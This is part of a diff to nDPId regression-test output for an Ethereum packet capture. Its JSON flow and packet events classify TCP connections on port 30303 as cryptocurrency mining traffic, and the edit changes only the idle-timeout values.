-00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1578508364784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364784,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGnhDAqAG4NOelbN0qdl\/FC\/g0LI3M54AQEAmIYgAAAQEICiLYlUdgPx7\/"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1578508364786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364786,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GKKu\/6qLGwKgBuHZf3SxpEHBBX7euwaAS\/ohj6AAAAgQFoAQCCAo0GJnqItiUTwEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1578508364786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364786,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFbPAqAG4v+qixt0sdl9ft67BaRBwQoAQEAmAJwAAAQEICiLYlUg0GJnq"} 
-00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1578508364786,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364787,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1578508364789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364789,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAADMGVclSkdz5wKgBuHZf3TlFnUTdn3ylU6AScSDFhwAAAgQFrAQCCAqGNr5sItiVBQEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1578508364789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364789,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGSNnAqAG4UpHc+d05dl+ffKVTRZ1E3oAQECxU+wAAAQEICiLYlUqGNr5s"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364714,"flow_last_seen":1578508364790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1578508364790,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1578508364817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364817,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACgG15goQ5CAwKgBuHZf3TZG9x3QfGwlk6AScSARhwAAAgQFoAQCCApyLMYFItiU0QEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1578508364817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364817,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGv6DAqAG4KEOQgN02dl98bCWTRvcd0YAQEAmgwgAAAQEICiLYlWVyLMYF"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364659,"flow_last_seen":1578508364819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1578508364819,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1578508364823,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364823,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACYGE48SimxDwKgBuHZf3S4uwDPtE20MrKAS\/ogQ2gAAAgQFrAQCCAqmusMwItiUTwEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1578508364823,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364823,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+ZbAqAG4EopsQ90udl8TbQysLsAz7oAQECws4QAAAQEICiLYlWmmusMw"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364824,"flow_last_seen":1578508364824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364824,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1578508364824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364824,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGhG3AqAG4n8tUH906dl\/csM+rAAAAALAC\/\/\/IeAAAAgQFtAEDAwUBAQgKItiVagAAAAAEAgAA"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508364825,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1578508364831,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364831,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAOcGbbUSilEcwKgBuHZf3S\/8FjKFFTVZHKASaN8k0QAAAgQFrAQCCApjgYkbItiUTwEDAwc="} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1578508364831,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364831,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFL7AqAG4EopRHN0vdl8VNVkc\/BYyhoAQECyrKAAAAQEICiLYlW9jgYkb"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364832,"flow_last_seen":1578508364832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364832,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1578508364832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364832,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGt9PAqAG4ouQdoN07dl+4t7BdAAAAALAC\/\/8\/HwAAAgQFtAEDAwUBAQgKItiVcAAAAAAEAgAA"} 
-00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":471,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1578508364833,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1578508364841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364841,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADcGsuQiYawWwKgBuHZf3SnE3x7vnZqFEqAS\/ojiZQAAAgQFrAQCCAoxzJM4ItiUTwEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1578508364841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364841,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGqezAqAG4ImGsFt0pdl+dmoUSxN8e8IAQECz+XAAAAQEICiLYlXkxzJM4"} 
-00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364842,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508364842,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1578508364862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364862,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGeCSlFmshwKgBuHZf3SJnRYz4cyqhtKAScSBl3gAAAgQFrAQCCAo1gVUZItiUTwEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1578508364862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364862,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGaCzAqAG4pRZrId0idl9zKqG0Z0WM+YAQECz0WAAAAQEICiLYlY01gVUZ"} 
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1578508364863,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1578508364877,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364877,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACEGk4U0u88bwKgBuHZf3S3Pd7n11PppgaAS\/oiD+wAAAgQFoAQCCApvJb2EItiUTwEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1578508364877,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364877,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGdI3AqAG4NLvPG90tdl\/U+mmBz3e59oAQEAmf6AAAAQEICiLYlZpvJb2E"} 
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":525,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1578508364879,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364922,"flow_last_seen":1578508364922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364922,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1578508364922,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364922,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGjuvAqAG4I+nFg909dl+ptEcpAAAAALAC\/\/+OGAAAAgQFtAEDAwUBAQgKItiVxAAAAAAEAgAA"} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364924,"flow_last_seen":1578508364924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364924,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1578508364924,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364924,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtY\/AqAG40frwzd0+dl+QvttrAAAAALAC\/\/85bQAAAgQFtAEDAwUBAQgKItiVxgAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1578508364784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364784,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGswg056VswKgBuHZf3SosjczmxQv4NKAS\/ohsIgAAAgQFoAQCCApgPx7\/ItiUTwEDAwc="} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1578508364784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364784,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGnhDAqAG4NOelbN0qdl\/FC\/g0LI3M54AQEAmIYgAAAQEICiLYlUdgPx7\/"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1578508364786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364786,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GKKu\/6qLGwKgBuHZf3SxpEHBBX7euwaAS\/ohj6AAAAgQFoAQCCAo0GJnqItiUTwEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1578508364786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364786,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFbPAqAG4v+qixt0sdl9ft67BaRBwQoAQEAmAJwAAAQEICiLYlUg0GJnq"} 
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1578508364786,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364787,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1578508364789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364789,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAADMGVclSkdz5wKgBuHZf3TlFnUTdn3ylU6AScSDFhwAAAgQFrAQCCAqGNr5sItiVBQEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1578508364789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364789,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGSNnAqAG4UpHc+d05dl+ffKVTRZ1E3oAQECxU+wAAAQEICiLYlUqGNr5s"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364714,"flow_last_seen":1578508364790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1578508364790,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1578508364817,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364817,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACgG15goQ5CAwKgBuHZf3TZG9x3QfGwlk6AScSARhwAAAgQFoAQCCApyLMYFItiU0QEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1578508364817,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364817,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGv6DAqAG4KEOQgN02dl98bCWTRvcd0YAQEAmgwgAAAQEICiLYlWVyLMYF"} 